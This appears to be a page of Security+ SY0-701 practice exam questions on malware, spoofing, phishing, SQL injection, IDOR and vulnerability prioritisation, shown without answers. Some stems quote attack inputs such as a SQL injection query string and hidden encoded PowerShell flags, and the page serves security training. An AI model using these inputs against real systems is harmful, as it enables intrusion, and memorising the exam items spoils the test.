A finance application works normally for weeks after a contractor leaves the company. On the first business day of the quarter, a hidden task runs, deletes archived reports, and then removes itself from the scheduled task list. What type of malware behavior is this?

Question 216easymultiple choice
Review the full subnetting walkthrough →

Several users on the same subnet report that their traffic to the default gateway is intermittently slow and sometimes reaches the wrong device. A packet capture shows ARP replies that map the gateway IP to a different MAC address. What attack is most likely occurring?

Question 217mediummultiple choice
Read the full NAT/PAT explanation →

A vulnerability scan reports a critical finding on a legacy application server. The security team verifies that the flagged package is installed, but the vulnerable code path is disabled by configuration and cannot be exploited in the current deployment. The vendor will not support a patch until next quarter. What is the best next step?

Question 218mediummultiple choice
Review the full subnetting walkthrough →

Several users on the same subnet report intermittent loss of access to the default gateway. A packet capture shows repeated unsolicited ARP replies mapping the gateway IP address to a different MAC address. Traffic is occasionally sent through an unknown workstation. What attack is most likely occurring?

Question 219easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which finding should the security team remediate first?

Exhibit

Weekly vulnerability scan summary:
1. WEB01 - Public web server - Critical CVE with known exploit and no compensating control
2. FILE02 - Internal file server - Medium severity missing patch
3. LAP09 - User laptop - Low severity browser plug-in issue
4. PRN01 - Network printer - Informational firmware notice only
Question 220hardmultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Based on the exhibit, which malware type best explains the behavior?

Exhibit

Administrator checks a suspected host:
tasklist /svc | findstr vpn
(no output)

netstat -ano | findstr 51433
TCP    0.0.0.0:51433     0.0.0.0:0     LISTENING     4

driverquery /v | findstr /i kbdflt2
kbdflt2.sys    Unknown    C:\Windows\System32\drivers\kbdflt2.sys

EDR note:
Process enumeration from user mode does not match kernel event telemetry.
Question 221mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst reviews an EDR alert on a Windows workstation. PowerShell was launched by a scheduled task, downloaded an encoded command from an external server, and then spawned rundll32.exe. No suspicious executable was written to disk. Which type of threat best fits this activity?

Question 222mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk analyst receives a ticket stating that an employee got an urgent text message from someone claiming to be the CEO. The message asked the employee to buy gift cards and send the redemption codes immediately. What attack is most likely taking place?

Question 223hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

During testing of a shopping portal, a POST request to /api/address/update succeeds even when the anti-CSRF token is removed. In a separate test, changing customerId=1842 to customerId=1843 in a GET request returns another user's invoice data. Which two vulnerabilities are present? Select two.

Question 224hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

During a workstation review, analysts find a process injecting into explorer.exe and reading keyboard and clipboard events. They also see repeated outbound HTTPS beacons to a domain registered two days ago. The host is not renaming files or displaying a ransom note. Which two findings are most consistent with spyware? Select two.

Question 225mediummultiple choice
Read the full VPN explanation →

A vulnerability scan reports three findings: a critical remote code execution issue on an internet-facing VPN appliance with a public exploit, a high-severity local privilege escalation on an isolated lab PC, and a medium-severity outdated browser plug-in on a workstation used for training. Which finding should be remediated first?

Question 226hardmulti select
Read the full DHCP explanation →

A branch office reports intermittent failures reaching internal sites. DHCP logs show clients receiving leases from an unknown MAC address, and DNS responses for intranet.example resolve to an address owned by the same device. Which two attacks best match the evidence? Select two.

Question 227mediummultiple choice
Read the full VPN explanation →

A vulnerability scan produces these results: - Finding 1: High severity, internet-facing VPN appliance, known exploit available, no compensating controls - Finding 2: Critical severity, internal development workstation, requires authenticated local access - Finding 3: Medium severity, test server, no public exploit and not reachable from outside Which finding should be remediated first?

Question 228mediummultiple choice
Read the full DNS explanation →

Users on the internal Wi-Fi report that the finance portal suddenly resolves to a different IP address, and the browser shows a fake login page that closely matches the real site. The DNS resolver cache on the network also contains unexpected entries for that host name. What attack is most likely?

Question 229mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A support agent notices that changing `invoiceId=8842` to `invoiceId=8843` in a portal URL returns another customer's invoice PDF without any additional login prompt. The user is already authenticated to the application. Which vulnerability is most likely present?

Question 230hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A SOC analyst reviews a suspicious email about an overdue invoice. The display name matches a known supplier, but the envelope sender is from a free webmail domain, and the Reply-To address uses a look-alike domain with one swapped letter. The message also includes a company logo and a PDF attachment. Which two findings are the strongest indicators of a phishing attempt? Select two.

Question 231mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A firewall analyst reviews logs and sees one external IP address sending connection attempts to TCP ports 22, 80, 139, 445, and 3389 on dozens of internal hosts every few seconds. No payloads are delivered and no sessions are established. What is the most likely activity?

Question 232hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An endpoint investigation shows winword.exe launching powershell.exe with -nop -w hidden -enc arguments. The same host also has a newly created WMI permanent event subscription, and no new executable has appeared in Downloads or Program Files. Which two findings are most consistent with a fileless compromise and persistence mechanism? Select two.

Question 233mediummultiple choice
Open the full VLAN trunking answer →

Users on the same VLAN report that their browser occasionally reaches a fake internal portal, and packet captures show one host sending forged ARP replies that claim to be the default gateway. Traffic from nearby systems begins flowing through that host. Which attack is occurring?

Question 234mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

Question 235mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

Question 236hardmulti select
Read the full DNS explanation →

A packet capture from a branch office shows the default gateway IP mapped to a MAC address that does not belong to the router. The same suspicious MAC also answers for the DNS server IP, and gratuitous ARP replies appear every 30 seconds. Which two attacks best match this evidence? Select two.

Question 237mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A help desk analyst receives a phone call from someone claiming to be the CFO, who says their phone was lost while traveling and requests an immediate MFA reset and temporary bypass for payroll access. The caller knows the CFO's last name and the company name, but cannot answer the callback verification question. What attack technique is most likely being used?

Question 238mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A workstation starts failing security checks. The antivirus service no longer appears in the running process list, a known driver's hash does not match the vendor's value, and a task manager view shows fewer processes than expected. The user also reports that local admin tools behave inconsistently. What type of malware is most likely present?

Question 239mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A finance clerk reports a call from a person who claimed to be from the bank's fraud department. The caller knew the employee's name, referenced a recent invoice, and asked the employee to read back a one-time MFA code to stop a supposed payment block. Which attack is most likely?

Question 240mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR alert shows powershell.exe launching with an encoded command, no new executable written to disk, and a registry run key added for persistence. Outbound HTTPS traffic then begins to a rare external domain. Which type of malware behavior is most likely?

Question 241mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Several employees report receiving SMS messages that appear to come from the corporate service desk. The text says, 'Your password expires today. Review the notice here,' followed by a shortened link that opens a fake sign-in page on a phone browser. Which type of attack is this?

Question 242mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An API log shows repeated requests such as `GET /api/orders?orderId=105%20OR%201=1--` followed by responses containing many customers' order records instead of one record. Which attack is most likely?

Question 243mediummultiple choice
Read the full DNS explanation →

A resolver log shows multiple clients querying the correct internal host name, but the DNS server starts returning an unexpected public IP address after a burst of unsolicited DNS responses from outside the network. Users are sent to a lookalike login page. What type of attack is most likely occurring?

Question 244easymultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user forwards an email that says their payroll account will be disabled today unless they click a link and verify their password. The message uses the company logo, but the sender address is from a free webmail domain and the link goes to a look-alike login page. What type of attack is this?

Question 245easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user forwards an email that says a shared document is available and must be reviewed within 10 minutes. The display name looks like a trusted vendor, but the Reply-To address points to a free webmail account. Which two details are strongest indicators that this is a phishing attempt? Select two.

Question 246hardmulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A user receives an SMS from 'IT Service Desk' saying their MFA enrollment expires today and includes a shortened link. Five minutes later, the user gets a phone call from the same number asking them to read back the code shown in the authenticator app so the ticket can be closed. Which two attack channels are used in this campaign? Select two.

Question 247mediummultiple choice
Read the full DNS explanation →

A public web server becomes unreachable during an outage. Netflow shows a large number of DNS responses arriving from many open resolvers, while the server itself only sent tiny spoofed DNS queries with the victim's address as the source. What type of attack is this?

Question 248mediummultiple choice
Read the full NAT/PAT explanation →

A SOC analyst sees many login attempts against one SaaS account from hundreds of IPs over 20 minutes. Most passwords are valid-looking, but only a few result in successful logons, and the successful attempts use a password pattern that was exposed in a public breach list. What is the best mitigation to reduce this attack?

Question 249easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A developer wants to reduce the risk of SQL injection in a new customer search form. Which two changes are the best mitigations? Select two.

Question 250mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A finance team receives emails that appear to come from the CEO's assistant and ask them to review a document. Several users entered their passwords on a fake login page, and the attackers then signed in from a new country using the same credentials. Which control most directly reduces successful account takeover if a password is stolen?

Question 251mediummultiple choice
Read the full NAT/PAT explanation →

A developer reports that a search field returns all customer records when they enter a single quote followed by OR 1=1. Security confirms the web app concatenates user input directly into SQL statements. Which remediation is best?

Question 252mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A vulnerability scan reports that a Windows file share has SMB signing disabled and anonymous read access is permitted to one directory containing payroll exports. No exploitation has been observed yet. Which action best reduces exposure with minimal business impact?

Question 253mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A file server suddenly shows many encrypted files with a new extension, and endpoint tools report that Volume Shadow Copy Service was disabled minutes earlier. A note on the desktop demands payment in cryptocurrency. What should the security team do first?

Question 254mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

Question 255mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An EDR alert shows a Windows workstation used certutil.exe to download an encoded script, then created a scheduled task named UpdateCheck that runs every 15 minutes. The machine is also making short HTTPS connections to the same external IP. What is the best description of what the attacker is doing?

Question 256easymulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An employee reports a suspicious email that appears to be from the help desk. Which two details are the strongest signs of phishing? Select two.

Question 257mediummultiple choice
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A cloud-hosted API lets users supply a URL for the service to fetch an image. Shortly after release, logs show requests to 169.254.169.254 and internal admin addresses. What control best reduces this risk?

Question 258mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security analyst is investigating a potential data exfiltration incident. Which three of the following indicators are most commonly associated with a data exfiltration attack? (Choose three.)

Question 259mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An organization is implementing security controls to mitigate the risk of social engineering attacks. Which three of the following are effective mitigations? (Choose three.)

Question 260mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

A security team is reviewing vulnerabilities in a web application. Which three of the following are common web application vulnerabilities that should be addressed? (Choose three.)

Question 261mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

An organization wants to reduce the risk of malware infections from removable media. Which three of the following controls should be implemented? (Choose three.)

Question 262mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Which four of the following are common indicators of a phishing attack? (Choose four.)

Question 263mediummulti select
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Which four of the following are effective mitigations against SQL injection attacks? (Choose four.)

Question 264mediumdrag order
Read the full Threats, Vulnerabilities, and Mitigations explanation →

Drag and drop the steps for the SSH key exchange process in the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5
Question 265mediumdrag order
Read the full VPN explanation →

Drag and drop the steps to configure a VPN tunnel using IPsec in tunnel mode into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order
1Step 1
2Step 2
3Step 3
4Step 4
5Step 5

Practice tests

Scored 10-question sessions with instant feedback and explanations.

SY0-701 Practice Test 1 — 10 Questions→SY0-701 Practice Test 2 — 10 Questions→SY0-701 Practice Test 3 — 10 Questions→SY0-701 Practice Test 4 — 10 Questions→SY0-701 Practice Test 5 — 10 Questions→SY0-701 Practice Exam 1 — 20 Questions→SY0-701 Practice Exam 2 — 20 Questions→SY0-701 Practice Exam 3 — 20 Questions→SY0-701 Practice Exam 4 — 20 Questions→Free SY0-701 Practice Test 1 — 30 Questions→Free SY0-701 Practice Test 2 — 30 Questions→Free SY0-701 Practice Test 3 — 30 Questions→SY0-701 Practice Questions 1 — 50 Questions→SY0-701 Practice Questions 2 — 50 Questions→SY0-701 Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

General Security ConceptsThreats, Vulnerabilities, and MitigationsSecurity ArchitectureSecurity OperationsSecurity Program Management and Oversight

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Threats, Vulnerabilities, and Mitigations setsAll Threats, Vulnerabilities, and Mitigations questionsSY0-701 Practice Hub